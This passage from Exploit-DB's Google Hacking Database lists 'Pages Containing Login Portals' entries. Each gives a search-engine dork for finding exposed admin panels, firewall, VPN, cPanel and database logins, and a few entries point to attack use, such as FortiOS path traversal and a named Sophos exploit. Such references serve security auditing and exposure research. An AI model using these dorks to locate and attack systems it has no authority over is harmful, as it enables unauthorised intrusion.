<textualDescription># Google Dork: inurl:/UserLogin intitle:&quot;::PayTV SMS::&quot; &quot;Aplomb Technology&quot;
# Date: 23/07/2021
# Exploit Author: Neha Singh
# Pages Containing Login Portals</textualDescription>
<query>inurl:/UserLogin intitle:&quot;::PayTV SMS::&quot; &quot;Aplomb Technology&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/UserLogin intitle:&quot;::PayTV SMS::&quot; &quot;Aplomb Technology&quot;</querystring>
<edb></edb>
<date>2021-07-23</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>6523</id>
<link>https://www.exploit-db.com/ghdb/6523</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/userportal/webpages/myaccount/login.jsp</shortDescription>
<textualDescription>Dorks:
inurl:/userportal/webpages/myaccount/login.jsp
Summary:
A Google dork that gives login page for the Sophos XG firewall
--
Thanks &amp; Regards,
Prasad Lingamaiah
</textualDescription>
<query>inurl:/userportal/webpages/myaccount/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/userportal/webpages/myaccount/login.jsp</querystring>
<edb></edb>
<date>2020-09-07</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>5401</id>
<link>https://www.exploit-db.com/ghdb/5401</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/users/sign_in</shortDescription>
<textualDescription>Login page :
inurl:/users/sign_in
inurl:/users/login
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/users/sign_in</query>
<querystring>https://www.google.com/search?q=inurl:/users/sign_in</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4932</id>
<link>https://www.exploit-db.com/ghdb/4932</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/usersignin?</shortDescription>
<textualDescription>Login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:/usersignin?</query>
<querystring>https://www.google.com/search?q=inurl:/usersignin?</querystring>
<edb></edb>
<date>2018-08-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7013</id>
<link>https://www.exploit-db.com/ghdb/7013</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/web-ftp.cgi</shortDescription>
<textualDescription># Google Dork: inurl:/web-ftp.cgi
# Pages containing login portals.
# Date: 1/07/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/web-ftp.cgi</query>
<querystring>https://www.google.com/search?q=inurl:/web-ftp.cgi</querystring>
<edb></edb>
<date>2021-07-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4341</id>
<link>https://www.exploit-db.com/ghdb/4341</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/web/device/login?lang=1</shortDescription>
<textualDescription>name =find h3c web manage login pages
Google dork Description: inurl:/web/device/login?lang=1
Google search: inurl:/web/device/login?lang=1
Author: id_No2015429
Find h3c web manage login pages.
Summary: h3c web manage login pages.</textualDescription>
<query>inurl:/web/device/login?lang=1</query>
<querystring>https://www.google.com/search?q=inurl:/web/device/login?lang=1</querystring>
<edb></edb>
<date>2016-10-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>5621</id>
<link>https://www.exploit-db.com/ghdb/5621</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/webconsole/webpages/login.jsp</shortDescription>
<textualDescription>Sophos XG Firewall Login pages
# Google Dork: inurl:/webconsole/webpages/login.jsp
# Date: [5-11-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>inurl:/webconsole/webpages/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/webconsole/webpages/login.jsp</querystring>
<edb></edb>
<date>2019-11-05</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>6445</id>
<link>https://www.exploit-db.com/ghdb/6445</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/webconsole/webpages/login.jsp</shortDescription>
<textualDescription># Google Dork: inurl:/webconsole/webpages/login.jsp
# Various Sophos Login page. Attacker may use https://www.exploit-db.com/exploits/48683 to exploit those pages
# Date: 23/07/2020
# Exploit Author: *Dharmveer Singh*
[image: image.png]
[image: image.png]
</textualDescription>
<query>inurl:/webconsole/webpages/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:/webconsole/webpages/login.jsp</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Dharmveer Singh</author>
</entry>
<entry>
<id>695</id>
<link>https://www.exploit-db.com/ghdb/695</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/webedit.* intext:WebEdit Professional -html</shortDescription>
<textualDescription>WebEdit is a content management system. This is the login portal search.</textualDescription>
<query>inurl:/webedit.* intext:WebEdit Professional -html</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3A%2Fwebedit.*+intext%3AWebEdit+Professional+-html</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4291</id>
<link>https://www.exploit-db.com/ghdb/4291</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/WebInterface/login.html</shortDescription>
<textualDescription>Login Pages for CrushFTP
May bring up other programs FTP pages.</textualDescription>
<query>inurl:/WebInterface/login.html</query>
<querystring>https://www.google.com/search?q=inurl:/WebInterface/login.html</querystring>
<edb></edb>
<date>2016-06-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4165</id>
<link>https://www.exploit-db.com/ghdb/4165</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/weblogin.aspx</shortDescription>
<textualDescription>inurl:/weblogin.aspx
Description : This google dork can access can access many login portals...
BY Sivabalan ( CYBER GENIUS )..</textualDescription>
<query>inurl:/weblogin.aspx</query>
<querystring>https://www.google.com/search?q=inurl:/weblogin.aspx</querystring>
<edb></edb>
<date>2015-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>7407</id>
<link>https://www.exploit-db.com/ghdb/7407</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/webmail/src/login.php intext:&quot;SquirrelMail&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/webmail/src/login.php intext:&quot;SquirrelMail&quot;
# Pages Containing Login Portals
# Date:11/10/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>inurl:/webmail/src/login.php intext:&quot;SquirrelMail&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/webmail/src/login.php intext:&quot;SquirrelMail&quot;</querystring>
<edb></edb>
<date>2021-10-11</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4184</id>
<link>https://www.exploit-db.com/ghdb/4184</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/welcome.cgi? | p=no-cert</shortDescription>
<textualDescription>Another Dork with Remote Logins
-Xploit </textualDescription>
<query>inurl:/welcome.cgi? | p=no-cert</query>
<querystring>https://www.google.com/search?q=inurl:/welcome.cgi? | p=no-cert</querystring>
<edb></edb>
<date>2016-01-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5405</id>
<link>https://www.exploit-db.com/ghdb/5405</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/wp-admin/admin.php intitle:&quot;Log In&quot;</shortDescription>
<textualDescription>wordpress Login Pages:
inurl:/wp-admin/admin.php intitle:&quot;Log In&quot;
Reza Abasi(Turku)
</textualDescription>
<query>inurl:/wp-admin/admin.php intitle:&quot;Log In&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/wp-admin/admin.php intitle:&quot;Log In&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5111</id>
<link>https://www.exploit-db.com/ghdb/5111</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/za/login.do</shortDescription>
<textualDescription>Zscaler admin login
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:/za/login.do</query>
<querystring>https://www.google.com/search?q=inurl:/za/login.do</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5756</id>
<link>https://www.exploit-db.com/ghdb/5756</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:/_layouts/userdisp.aspx?id= intext:password</shortDescription>
<textualDescription>This dork found various login portals:
inurl:/_layouts/userdisp.aspx?id= intext:password
*Wethenorthcvv
</textualDescription>
<query>inurl:/_layouts/userdisp.aspx?id= intext:password</query>
<querystring>https://www.google.com/search?q=inurl:/_layouts/userdisp.aspx?id= intext:password</querystring>
<edb></edb>
<date>2020-02-27</date>
<author>Wethenorthcvv</author>
</entry>
<entry>
<id>5661</id>
<link>https://www.exploit-db.com/ghdb/5661</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:10443/remote/login</shortDescription>
<textualDescription>Dork for find any pages with the FortiOS Path Traversal vulnerability
</textualDescription>
<query>inurl:10443/remote/login</query>
<querystring>https://www.google.com/search?q=inurl:10443/remote/login</querystring>
<edb></edb>
<date>2019-12-02</date>
<author>sh4d0w</author>
</entry>
<entry>
<id>777</id>
<link>https://www.exploit-db.com/ghdb/777</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:1810 &quot;Oracle Enterprise Manager&quot;</shortDescription>
<textualDescription>Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out-of-the box.</textualDescription>
<query>inurl:1810 &quot;Oracle Enterprise Manager&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A1810+%22Oracle+Enterprise+Manager%22</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1288</id>
<link>https://www.exploit-db.com/ghdb/1288</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com</shortDescription>
<textualDescription>RemotelyAnywhere is a program that enables remote control, in the same matter as VNC. Once Logged in an attacker has almost complete control of the computer.</textualDescription>
<query>inurl:2000 intitle:RemotelyAnywhere -site:realvnc.comg</query>
<querystring>https://www.google.com/search?q=inurl:2000+intitle:RemotelyAnywhere+-site:realvnc.com&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>7987</id>
<link>https://www.exploit-db.com/ghdb/7987</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:443 ext:php inurl:login</shortDescription>
<textualDescription># Google Dork: inurl:443 ext:php inurl:login
# Pages Containing Login Portals
# Date:25/07/2022
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>inurl:443 ext:php inurl:login</query>
<querystring>https://www.google.com/search?q=inurl:443 ext:php inurl:login</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>7650</id>
<link>https://www.exploit-db.com/ghdb/7650</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:4444 ext:php inurl:login</shortDescription>
<textualDescription># Google Dork: inurl:4444 ext:php inurl:login
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>inurl:4444 ext:php inurl:login</query>
<querystring>https://www.google.com/search?q=inurl:4444 ext:php inurl:login</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>3864</id>
<link>https://www.exploit-db.com/ghdb/3864</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:5000/webman/index.cgi</shortDescription>
<textualDescription>Synology nas login </textualDescription>
<query>inurl:5000/webman/index.cgi</query>
<querystring>https://www.google.com/search?q=inurl:5000/webman/index.cgi</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>5188</id>
<link>https://www.exploit-db.com/ghdb/5188</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:7474/browser intitle:Neo4j</shortDescription>
<textualDescription>Login pages of Neo4j graph database. Some pages can even access the
database.
Author : Raj Kiran P
</textualDescription>
<query>inurl:7474/browser intitle:Neo4j</query>
<querystring>https://www.google.com/search?q=inurl:7474/browser intitle:Neo4j</querystring>
<edb></edb>
<date>2019-04-22</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>7681</id>
<link>https://www.exploit-db.com/ghdb/7681</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:80 ext:php inurl:login</shortDescription>
<textualDescription># Google Dork: inurl:80 ext:php inurl:login
# Pages Containing Login Portals
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:80 ext:php inurl:login</query>
<querystring>https://www.google.com/search?q=inurl:80 ext:php inurl:login</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>3879</id>
<link>https://www.exploit-db.com/ghdb/3879</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:8080 intitle:&quot;login&quot; intext:&quot;UserLogin&quot; &quot;English&quot;</shortDescription>
<textualDescription>#Summary: VoIP login portals
#Category: Pages containing login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>inurl:8080 intitle:&quot;login&quot; intext:&quot;UserLogin&quot; &quot;English&quot;</query>
<querystring>https://www.google.com/search?q=inurl:8080 intitle:&quot;login&quot; intext:&quot;UserLogin&quot; &quot;English&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6361</id>
<link>https://www.exploit-db.com/ghdb/6361</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:8080/login.php</shortDescription>
<textualDescription>
Dork: inurl:8080/login.php
Author: Priyanka Prasad
</textualDescription>
<query>inurl:8080/login.php</query>
<querystring>https://www.google.com/search?q=inurl:8080/login.php</querystring>
<edb></edb>
<date>2020-07-01</date>
<author>Priyanka Prasad</author>
</entry>
<entry>
<id>5938</id>
<link>https://www.exploit-db.com/ghdb/5938</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:8080/portal/pda/?force.login=yes</shortDescription>
<textualDescription># Google Dork: inurl:8080/portal/pda/?force.login=yes
# Pages containing login portals.
# Date: 22/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:8080/portal/pda/?force.login=yes</query>
<querystring>https://www.google.com/search?q=inurl:8080/portal/pda/?force.login=yes</querystring>
<edb></edb>
<date>2020-04-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5834</id>
<link>https://www.exploit-db.com/ghdb/5834</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:8080/webinterface intitle:&quot;crushftp&quot;</shortDescription>
<textualDescription># Google Dork: inurl:8080/webinterface intitle:&quot;crushftp&quot;
# By using this dork, various web interfaces for the Crush FTP containing
login portals can be found.
# Date: 27/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:8080/webinterface intitle:&quot;crushftp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:8080/webinterface intitle:&quot;crushftp&quot;</querystring>
<edb></edb>
<date>2020-03-27</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7649</id>
<link>https://www.exploit-db.com/ghdb/7649</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:8888 ext:php inurl:login</shortDescription>
<textualDescription># Google Dork: inurl:8888 ext:php inurl:login
# Pages Containing Login Portals
# Date: 05/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>inurl:8888 ext:php inurl:login</query>
<querystring>https://www.google.com/search?q=inurl:8888 ext:php inurl:login</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>5248</id>
<link>https://www.exploit-db.com/ghdb/5248</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:9000 AND intext:&quot;Continuous Code Quality&quot;</shortDescription>
<textualDescription>Category: Pages containing login portals
Description: Dork for publicly available SonarQube dashboard pages
Dork: inurl:9000 &amp; intext:&quot;Continuous Code Quality&quot;
Date: 05/06/2019
Author: Goktug Serez
</textualDescription>
<query>inurl:9000 AND intext:&quot;Continuous Code Quality&quot;</query>
<querystring>https://www.google.com/search?q=inurl:9000 AND intext:&quot;Continuous Code Quality&quot;</querystring>
<edb></edb>
<date>2019-06-05</date>
<author>Goktug Serez</author>
</entry>
<entry>
<id>4253</id>
<link>https://www.exploit-db.com/ghdb/4253</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:9443/vsphere-client</shortDescription>
<textualDescription>Google dork Description: inurl:9443/vsphere-client
Google search: inurl:9443/vsphere-client
Date: 2016-02-04
Author: khajj16
Summary: The VMware vSphere Web Client is the Web-based application that
connects users to the vCenter Server to manage installations and handle
inventory objects in a vSphere environment.</textualDescription>
<query>inurl:9443/vsphere-client</query>
<querystring>https://www.google.com/search?q=inurl:9443/vsphere-client</querystring>
<edb></edb>
<date>2016-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>977</id>
<link>https://www.exploit-db.com/ghdb/977</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl::2082/frontend -demo</shortDescription>
<textualDescription>This allows you access to CPanel login dialogues/screens.</textualDescription>
<query>inurl::2082/frontend -demo</query>
<querystring>https://www.google.com/search?q=inurl%3A%3A2082%2Ffrontend+-demo</querystring>
<edb></edb>
<date>2005-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4380</id>
<link>https://www.exploit-db.com/ghdb/4380</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:action=php.login</shortDescription>
<textualDescription>#GoogleDork:inurl:action=php.login
#you can found a different admin page
#Dork Author: @HACKERHMB</textualDescription>
<query>inurl:action=php.login</query>
<querystring>https://www.google.com/search?q=inurl:action=php.login</querystring>
<edb></edb>
<date>2017-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>6736</id>
<link>https://www.exploit-db.com/ghdb/6736</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com</shortDescription>
<textualDescription>Dork: inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com
Description:
Finding ADFS Login Panels
Thank you
</textualDescription>
<query>inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com</query>
<querystring>https://www.google.com/search?q=inurl:adfs inurl:wctx inurl:wtrealm -microsoft.com</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Piyush Patil</author>
</entry>
<entry>
<id>5387</id>
<link>https://www.exploit-db.com/ghdb/5387</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin. intitle:&quot;admin login&quot;</shortDescription>
<textualDescription>Login page :
inurl:admin. intitle:&quot;admin login&quot;
intitle:&quot;admin login&quot; inurl:/admin login
Reza Abasi(Turku)
</textualDescription>
<query>inurl:admin. intitle:&quot;admin login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:admin. intitle:&quot;admin login&quot;</querystring>
<edb></edb>
<date>2019-08-19</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6110</id>
<link>https://www.exploit-db.com/ghdb/6110</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin.aspx</shortDescription>
<textualDescription>Dork: inurl:admin.aspx
Description: This google dork lists out asp.net admin pages for web
servers.
Author: Abhi Chitkara
</textualDescription>
<query>inurl:admin.aspx</query>
<querystring>https://www.google.com/search?q=inurl:admin.aspx</querystring>
<edb></edb>
<date>2020-05-21</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5060</id>
<link>https://www.exploit-db.com/ghdb/5060</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin.php inurl:admin ext:php</shortDescription>
<textualDescription> Admin Login Page !!(inurl:admin.php inurl:admin ext:php)
Dork by T3jv1l
</textualDescription>
<query>inurl:admin.php inurl:admin ext:php</query>
<querystring>https://www.google.com/search?q=inurl:admin.php inurl:admin ext:php</querystring>
<edb></edb>
<date>2018-12-20</date>
<author>T3jv1l</author>
</entry>
<entry>
<id>6172</id>
<link>https://www.exploit-db.com/ghdb/6172</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin/admin/Login</shortDescription>
<textualDescription># Google Dork: inurl:admin/admin/Login
# Description:- This page contains various admin login portals.
# Author: Suhanaz Kazi
# Date: 29-May-2020
# Linkedin: http://linkedin.com/in/suhanaaz
--
Regards,
Suhanaz
</textualDescription>
<query>inurl:admin/admin/Login</query>
<querystring>https://www.google.com/search?q=inurl:admin/admin/Login</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Suhanaz Kazi</author>
</entry>
<entry>
<id>5488</id>
<link>https://www.exploit-db.com/ghdb/5488</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin/changepassword*</shortDescription>
<textualDescription>Google Dork:
inurl:admin/changepassword*
inurl:admin/resetpassword*
Category: Pages Containing Login Portals
Description: This Dork will find 'change-password' pages.
(Note: Platform Not Matters &amp;&amp; i.e .php, .aspx, .net etc..)
Author:Abhishek Samaddar</textualDescription>
<query>inurl:admin/changepassword*</query>
<querystring>https://www.google.com/search?q=inurl:admin/changepassword*</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Abhishek Samaddar</author>
</entry>
<entry>
<id>6175</id>
<link>https://www.exploit-db.com/ghdb/6175</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin/login.aspx</shortDescription>
<textualDescription># Google Dork: inurl:admin/login.aspx
# Results: List of Admin Login Webpage generated by web servers
# running the Microsoft ASP.NET framework.
# Date: 2020-05-31
# Author: Vikash Kumar
# Linkedin: https://www.linkedin.com/in/vikash-kumar-7b938a176
# Twitter: https://twitter.com/vksutk
--
Thanks &amp; Regards
*Vikash Kumar*
</textualDescription>
<query>inurl:admin/login.aspx</query>
<querystring>https://www.google.com/search?q=inurl:admin/login.aspx</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Vikash Kumar</author>
</entry>
<entry>
<id>6222</id>
<link>https://www.exploit-db.com/ghdb/6222</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin/login.jsp</shortDescription>
<textualDescription>Dork : inurl:admin/login.jsp
Description : List of admin login portals of various website.
Author: Ajaysen R
</textualDescription>
<query>inurl:admin/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl:admin/login.jsp</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>AJAYSEN R</author>
</entry>
<entry>
<id>5674</id>
<link>https://www.exploit-db.com/ghdb/5674</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin/login.php?login= intitle:&quot;CMS&quot;</shortDescription>
<textualDescription>Google Dorks:
inurl:admin/login.php?login= intitle:&quot;CMS&quot;
inurl:admin/login.php?login= intitle:&quot;Dashboard&quot;
This dork finding some useful cms login page.
Berat İşler (root1x)
</textualDescription>
<query>inurl:admin/login.php?login= intitle:&quot;CMS&quot;</query>
<querystring>https://www.google.com/search?q=inurl:admin/login.php?login= intitle:&quot;CMS&quot;</querystring>
<edb></edb>
<date>2019-12-20</date>
<author>berat isler</author>
</entry>
<entry>
<id>7371</id>
<link>https://www.exploit-db.com/ghdb/7371</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin/reset.php -github</shortDescription>
<textualDescription># Google Dork: inurl:admin/reset.php -github
# Pages Containing Login Portals
# Date: 08/09/2021
# Exploit Author: Vaibhav Kumar Srivastava</textualDescription>
<query>inurl:admin/reset.php -github</query>
<querystring>https://www.google.com/search?q=inurl:admin/reset.php -github</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Vaibhav Kumar Srivastava</author>
</entry>
<entry>
<id>6181</id>
<link>https://www.exploit-db.com/ghdb/6181</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:admin/upload.asp</shortDescription>
<textualDescription># Google Dork: inurl:admin/upload.asp
# Sensitive directories and login portals.
# Date: 29/05/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:admin/upload.asp</query>
<querystring>https://www.google.com/search?q=inurl:admin/upload.asp</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>485</id>
<link>https://www.exploit-db.com/ghdb/485</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:administrator &quot;welcome to mambo&quot;</shortDescription>
<textualDescription>Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.Vendor: http://www.mamboserver.com/Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3 Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&amp;sbm=bid&amp;submit=Search%21&amp;metaname=alldoc</textualDescription>
<query>inurl:administrator &quot;welcome to mambo&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3Aadministrator+%22welcome+to+mambo%22</querystring>
<edb></edb>
<date>2004-09-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>6114</id>
<link>https://www.exploit-db.com/ghdb/6114</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminlogin.asp</shortDescription>
<textualDescription># Google Dork:
inurl:adminlogin.asp
inurl:administratorlogin.asp
# Various pages containing login portals.
# Date: 22/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:adminlogin.asp</query>
<querystring>https://www.google.com/search?q=inurl:adminlogin.asp</querystring>
<edb></edb>
<date>2020-05-22</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6157</id>
<link>https://www.exploit-db.com/ghdb/6157</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminlogin.do</shortDescription>
<textualDescription># Google Dork inurl:adminlogin.do
# Description:- list of admin login page of various websites.
# Author: Janmejaya Swain
# Date: 28-May-2020
# Linkedin: https://www.linkedin.com/in/janmejayaswainofficial
</textualDescription>
<query>inurl:adminlogin.do</query>
<querystring>https://www.google.com/search?q=inurl:adminlogin.do</querystring>
<edb></edb>
<date>2020-05-29</date>
<author>Janmejaya Swain</author>
</entry>
<entry>
<id>6166</id>
<link>https://www.exploit-db.com/ghdb/6166</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminlogin.htm</shortDescription>
<textualDescription># Google Dork inurl:adminlogin.htm
# Description:- list of admin login page of various websites.
# Author: Agrah Jain
# Date: 30-May-2020
</textualDescription>
<query>inurl:adminlogin.htm</query>
<querystring>https://www.google.com/search?q=inurl:adminlogin.htm</querystring>
<edb></edb>
<date>2020-06-02</date>
<author>Agrah Jain</author>
</entry>
<entry>
<id>6155</id>
<link>https://www.exploit-db.com/ghdb/6155</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminlogin.html</shortDescription>
<textualDescription>inurl:adminlogin.html
Description:- This dork id will find the admin login portal devloped under
HTML technology
Auther:- Deepesh Kumar Pandey
</textualDescription>
<query>inurl:adminlogin.html</query>
<querystring>https://www.google.com/search?q=inurl:adminlogin.html</querystring>
<edb></edb>
<date>2020-05-29</date>
<author>Deepesh Kumar Pandey</author>
</entry>
<entry>
<id>6150</id>
<link>https://www.exploit-db.com/ghdb/6150</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminlogin.jsp</shortDescription>
<textualDescription>- *Google Dork:*
* inurl:adminlogin.jsp*
- *Results:* *The results gives a list of admin login page of various
website.*
- *Date:* *28/05/2020*
- *Author:* *Vikash Kumar*
</textualDescription>
<query>inurl:adminlogin.jsp</query>
<querystring>https://www.google.com/search?q=inurl:adminlogin.jsp</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Vikash Kumar</author>
</entry>
<entry>
<id>6286</id>
<link>https://www.exploit-db.com/ghdb/6286</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminlogin.jsp</shortDescription>
<textualDescription>#Google Dork:- inurl:adminlogin.jsp
#Description: This Page Contains Various Admin login Pages for a web server.
#Author: Md Anzaruddin
Linkedin: https://www.linkedin.com/in/mdanzaruddin/
#Date: 15-June-2020
---
Regards:
Md Anzaruddin
</textualDescription>
<query>inurl:adminlogin.jsp</query>
<querystring>https://www.google.com/search?q=inurl:adminlogin.jsp</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Md Anzaruddin</author>
</entry>
<entry>
<id>6138</id>
<link>https://www.exploit-db.com/ghdb/6138</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminlogin.php</shortDescription>
<textualDescription>Dork: inurl:adminlogin.php
Description: This google dork lists out php admin login pages for a web
server
Author: Abhi Chitkara
</textualDescription>
<query>inurl:adminlogin.php</query>
<querystring>https://www.google.com/search?q=inurl:adminlogin.php</querystring>
<edb></edb>
<date>2020-05-27</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>8124</id>
<link>https://www.exploit-db.com/ghdb/8124</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminpanel site:*.in</shortDescription>
<textualDescription># Google Dork: inurl:adminpanel site:*.in
# Pages Containing Login Portals
# Date:24/03/2023
# Exploit Author: Md rofikul</textualDescription>
<query>inurl:adminpanel site:*.in</query>
<querystring>https://www.google.com/search?q=inurl:adminpanel site:*.in</querystring>
<edb></edb>
<date>2023-03-24</date>
<author>Md rofikul</author>
</entry>
<entry>
<id>6168</id>
<link>https://www.exploit-db.com/ghdb/6168</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:adminpanel.aspx</shortDescription>
<textualDescription>inurl:adminpanel.aspx
description: Rhis dork id will find the admin panel created with aspx
technology
Author: Deepesh Kumar Pandey
</textualDescription>
<query>inurl:adminpanel.aspx</query>
<querystring>https://www.google.com/search?q=inurl:adminpanel.aspx</querystring>
<edb></edb>
<date>2020-06-02</date>
